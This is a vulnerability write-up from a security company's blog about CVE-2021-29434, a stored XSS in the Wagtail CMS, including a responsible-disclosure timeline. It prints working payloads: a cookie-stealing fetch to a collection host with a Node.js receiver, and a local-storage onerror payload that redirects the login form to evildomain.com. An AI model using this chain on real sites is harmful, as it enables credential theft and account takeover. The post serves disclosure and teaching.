Every now and then I like to do a bit of bug hunting in open source projects. I love the challenge. There might not be – and often isn’t – anything significant, but every now and again I find something interesting. This is one of those times.

Tl;dr

CVE-2021-29434: With editor permissions we can craft an XSS that, if triggered by a moderator or admin account, can be used to write to the browser’s local storage. Once the local storage key has been set we can steal the credentials for the user account that triggered the XSS, leading to full account takeover, even if the original XSS gets patched. You can find the advisory on Wagtail’s Github: https://github.com/wagtail/wagtail/security/advisories/GHSA-wq5h-f9p5-q7fx

Wagtail

Wagtail is an open source content management system (CMS). It’s written in Python and targets the Django ecosystem of web frameworks.

It doesn’t do much on its own. It’s used as a base, with a custom application built on top of it that uses Wagtail’s API and features to provide powerful content editors, letting you focus on building content rather than developing features. This was an important thing to note when it came to testing, as you’ll see shortly.

Setup

To give credit to the Wagtail developers – getting this set up and functioning was fairly simple. Running everything in a Python virtual environment took no more than a couple of minutes before I had a local running instance that I could access and start playing with.

Or so I thought…

It was looking good. I could access the admin panel and accounts and create pages, but I was limited in what content I could create. This takes us back to what Wagtail is. It’s not a comprehensive web application for creating content, but a fully featured and extendable base application for content management.

I initially thought that I would have to build my own application that exposes the API to test all the features, which wasn’t something I wanted to invest time in. This was supposed to be a quick bug hunt after all.

Fortunately I didn’t have to, because Wagtail also ships a demo project called Bakery.

This demo site provides examples of common features and recipes to introduce you to Wagtail development. Beyond the code, it also lets you explore the admin and editorial interface of the CMS.

This seemed ideal for testing, and setting it up was much the same as before, except it also provides a docker-compose.yml file that delivers a more representative production environment with a “real” database, Elasticsearch and Redis alongside the main application. I didn’t need this to get started, so I stuck with the Python virtual environment.

There were a couple of differences from the initial setup. Note the edit to the base.txt file to install the latest version of Wagtail instead of the pinned version.

Success! We now have a functional and locally running Wagtail instance that is more representative of a real installation.

Now we can start looking for vulnerabilities. I’ve always found XSS bugs the easiest to find – just look for anywhere a user has input and see what you can do with it.

After playing around with the different types of input, it looked like everything was being properly escaped when it was rendered or validated by the frontend. So, I changed tack and looked at the data that was being sent to the server to see if I could bypass any of the validation.

XSS

This is where we find the vulnerability. One of the RichText plugins allows you to add a link, and if we can control the URL, it may be possible to inject a javascript: href. This means anyone clicking the link would run the JavaScript we give it.

The above image doesn’t look happy. If we try each of the link types, we can see that the internal, external and email types all fail server-side validation if we try to use a javascript: URI as the link target.

Phone and anchor links, however, would allow us to set the URL and save it. Unfortunately, when the link is rendered in the frontend, the URL is prefixed with either tel: or #, depending on the format we selected, effectively removing the XSS.

I had been focusing on the requests that create the link element, tampering with the data sent to the server to see if I could bypass the validation or strip out the prefix that was being inserted.

Taking a step back, I looked at the POST request that was used to save the entire page contents instead of the POST request that saves the link we want to add. The link content was being set in this request as well.

With the request intercepted in Burp, I removed the # that was prefixing the URL attribute and clicked “forward” to send the modified request to the server.

Success!

It requires interaction by someone clicking the link, but if they do, we get a successful XSS.

Weaponizing the XSS

With our XSS in place, we needed to weaponize it; otherwise it wouldn’t be an effective vulnerability. We had a couple of targets:

  • End users of the application
  • Moderators and admins

For most Wagtail implementations, I expected that targeting end users wouldn’t achieve much. They are unlikely to have access to any sensitive parts of the site or data, after all.

Targeting moderators or admins carries a much higher risk, especially as we can make these changes with the lowest level of permissions – as an Editor.

Yes, there is social engineering at play here, and yes it may be obvious to admins and moderators. The focus here is not to create the most convincing lure – just to showcase the possibilities.

So let’s look at some payloads.

The obvious one here is to grab the sessionid from the cookie. Then we can impersonate the account by replacing our own session. This is as simple as reading the cookie value with document.cookie and posting it to our own domain with the fetch API.

javascript:fetch('https://127.0.0.1:8282/cookie?cookie='+document.cookie);
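On the receiving end, all we need is something that logs the incoming request. Here is a minimal sketch of such a collection endpoint, assuming Node.js on an attacker-controlled host listening on port 8282 (in practice you’d front it with TLS to match the https URL in the payload above):

// collect.js – minimal sketch of a hypothetical collection endpoint
// Logs any value sent to /cookie?cookie=...
const http = require('http');

http.createServer((req, res) => {
  const cookie = new URL(req.url, 'http://localhost').searchParams.get('cookie');
  if (cookie) {
    console.log('Received cookie:', cookie);
  }
  res.end();
}).listen(8282);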

We got the cookie, but it didn’t contain the session ID. This is because the session cookie is set with the HttpOnly flag, which means it can’t be accessed from JavaScript. We could also see a CSRF token, which means that trying to automate tasks like creating a new admin account or upgrading our account permissions is going to be a lot harder.

As I was looking for other places the session ID may be stored, I spotted something very strange in Local Storage.

Without getting into the specifics, Local Storage is a key-value store that persists data in the user’s browser and, more importantly, JavaScript can read and write to it.
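As a quick illustration of the standard Web Storage API (nothing Wagtail-specific here):

// Values written to local storage persist across page loads and browser sessions
localStorage.setItem('example:key', 'some value');  // write
localStorage.getItem('example:key');                // read -> "some value"
localStorage.removeItem('example:key');             // delete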

The key in question, wagtail:spriteData, stores the SVG data used to show icons in the admin interface. I’m not going to lie: this was, and still is, very confusing to me. Why were the developers using local storage in this way? Other fonts and icons are loaded using Font Awesome.

So how can we abuse this? First, let’s see if we can get something in that will render into the browser.

The first attempt at writing script tags failed.

javascript:localStorage.setItem('wagtail:spriteData', '<script>alert("xss");</script>');

I think this is due to the way this data is rendered into the DOM: script tags inserted this way are never executed. But there are other ways.
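You can see this behaviour in any browser console. The snippet below is a generic illustration of the HTML parsing rules, not Wagtail’s actual rendering code:

// Markup assigned via innerHTML is parsed, but <script> elements never execute
const div = document.createElement('div');
document.body.appendChild(div);

div.innerHTML = '<script>alert("never runs")<\/script>';       // no alert

// Event handler attributes on other elements do still fire
div.innerHTML = '<img src=1 onerror="alert(\'this runs\')">';  // alert fires when the image fails to load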

javascript:localStorage.setItem('wagtail:spriteData', '<img src=1 onerror="javascript:alert(1)"></img>');

Intercepting the request as before, anyone clicking the link will see no visible change. However, the next time they navigate to the /admin pages, the data in local storage is written to the DOM and our XSS fires. In fact, our XSS fires every time an admin page is visited in this browser – and it even works if the user is logged out.
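The admin-side behaviour is roughly equivalent to the sketch below. This is a simplification of what the icon-sprite loader appears to do, not Wagtail’s actual source; only the wagtail:spriteData key name is taken from the application itself:

// Simplified sketch of the sprite-loading behaviour (not Wagtail's real code)
const spriteData = localStorage.getItem('wagtail:spriteData');
if (spriteData) {
  const container = document.createElement('div');
  container.innerHTML = spriteData;   // whatever was stored here ends up in the DOM
  document.body.appendChild(container);
}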

Now we have enough to build a full exploit chain:

  • Edit a page or element that will let us add or modify a link element
  • Set the type to anchor link
  • Set the URL to match the code block below
  • Insert the anchor
  • Save draft or publish the page and intercept the request
  • Remove the # from the URL and forward the modified request

javascript:localStorage.setItem('wagtail:spriteData', '<img src=1 onerror="javascript:window.onload = function(){let form = document.getElementsByTagName(\'form\')[0]; form.action = \'https://evildomain.com/login.html\'; form.method = \'get\';}"></img>');

There is a lot going on here, so let’s break it down.

When the link is clicked, a key named wagtail:spriteData in local storage is updated, and its value is set to:

'<img src=1 onerror="javascript:window.onload = function(){let form = document.getElementsByTagName(\'form\')[0]; form.action = \'https://evildomain.com/login.html\'; form.method = \'get\';}"></img>'

Now, every time the user visits the login page and this code is loaded from local storage, the img tag is created with a bad src, which means the code in onerror will run.

The JavaScript code in onerror will wait for the page to finish loading. Once the page is ready it will look for an HTML form. If it finds a form, it will change the action to point to a domain controlled by the attacker. We also set the method to GET instead of POST, but that’s just to make this easier to demonstrate.
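Written out as plain JavaScript rather than a one-line payload, the onerror handler is doing something like this (evildomain.com stands in for any attacker-controlled host):

// Readable version of the onerror handler from the payload above
window.onload = function () {
  // On Wagtail's login page, the first <form> is the login form
  let form = document.getElementsByTagName('form')[0];
  if (form) {
    form.action = 'https://evildomain.com/login.html';  // credentials now go to the attacker
    form.method = 'get';                                 // GET just makes the demo easier to observe
  }
};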

The result is that the next time the target user attempts to log in, they will actually send us their credentials.

There are a few more steps you would need to take to make this truly effective, but what I’ve shared should indicate the types of attack that can be attempted if you can chain a few components together.

Disclosure timeline

Wagtail is open source and uses GitHub as its code repository. When I was looking for a responsible way to disclose the vulnerabilities, I found its security policy with ease. More open-source projects should use this feature.

30 March 2021: Initial email with details of both components sent to [email protected]

1 April 2021: Response from Wagtail confirming the validity of the XSS and querying the local storage element

1 April 2021: Agreed that the second component is not strictly a vulnerability

8 April 2021: GitHub draft advisory created

19 April 2021: Security advisory published

Labs

If you’re a commercial customer with us and want to gain practical experience in identifying and remediating XSS vulnerabilities in Python web application frameworks, check out these labs:


Kev Breen,
Director of Cyber Threat Research,
Immersive Labs

@kevthehermit